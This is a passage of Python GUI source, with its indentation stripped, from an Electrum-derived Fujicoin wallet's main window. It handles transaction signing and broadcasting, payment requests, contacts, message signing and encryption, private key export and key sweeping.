_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.print_error(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Fujicoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error(_('Cannot find payment request in wallet.'))
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
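# expose every public command in the console, skipping private attributes and
# names that would shadow the namespace entries set above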
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a fujicoin URI
if str(data).startswith("fujicoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
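# raw transactions are transported base43-encoded, which packs more data
# into the QR alphanumeric mode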
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
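# Worker thread: export one key per address, emitting progress after each,
# and stop early if the dialog was closed or already finished.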
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
writer = csv.writer(f)
writer.writerow(["address", "private_key"])
for addr, pk in pklist.items():
writer.writerow(["%34s" % addr, pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
#traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
